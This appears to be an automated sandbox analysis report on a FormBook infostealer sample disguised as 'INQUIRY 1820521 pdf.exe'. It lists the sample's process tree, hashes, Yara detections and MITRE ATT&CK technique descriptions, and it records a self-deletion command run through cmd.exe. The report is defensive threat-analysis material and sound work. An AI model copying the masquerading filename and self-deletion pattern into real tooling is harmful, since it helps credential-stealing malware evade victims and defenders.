Analysis Process: INQUIRY 1820521 pdf.exe PID: 2848 Parent PID: 6928

General

Start time:	09:42:20
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Imagebase:	0x390000
File size:	859648 bytes
MD5 hash:	DD3AE15E952C239AE6D87C8374B3B460
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: INQUIRY 1820521 pdf.exe PID: 1848 Parent PID: 6928

General

Start time:	09:42:20
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Imagebase:	0xa0000
File size:	859648 bytes
MD5 hash:	DD3AE15E952C239AE6D87C8374B3B460
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: INQUIRY 1820521 pdf.exe PID: 1496 Parent PID: 6928

General

Start time:	09:42:21
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Imagebase:	0x1d0000
File size:	859648 bytes
MD5 hash:	DD3AE15E952C239AE6D87C8374B3B460
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: INQUIRY 1820521 pdf.exe PID: 1664 Parent PID: 6928

General

Start time:	09:42:21
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Imagebase:	0x940000
File size:	859648 bytes
MD5 hash:	DD3AE15E952C239AE6D87C8374B3B460
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3424 Parent PID: 1664

General

Start time:	09:42:24
Start date:	12/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: autochk.exe PID: 6816 Parent PID: 3424

General

Start time:	09:42:40
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autochk.exe
Imagebase:	0xe00000
File size:	871424 bytes
MD5 hash:	34236DB574405291498BCD13D20C42EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: ipconfig.exe PID: 6824 Parent PID: 3424

General

Start time:	09:42:41
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ipconfig.exe
Imagebase:	0xb50000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 6852 Parent PID: 6824

General

Start time:	09:42:44
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6860 Parent PID: 6852

General

Start time:	09:42:45
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report INQUIRY 1820521 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre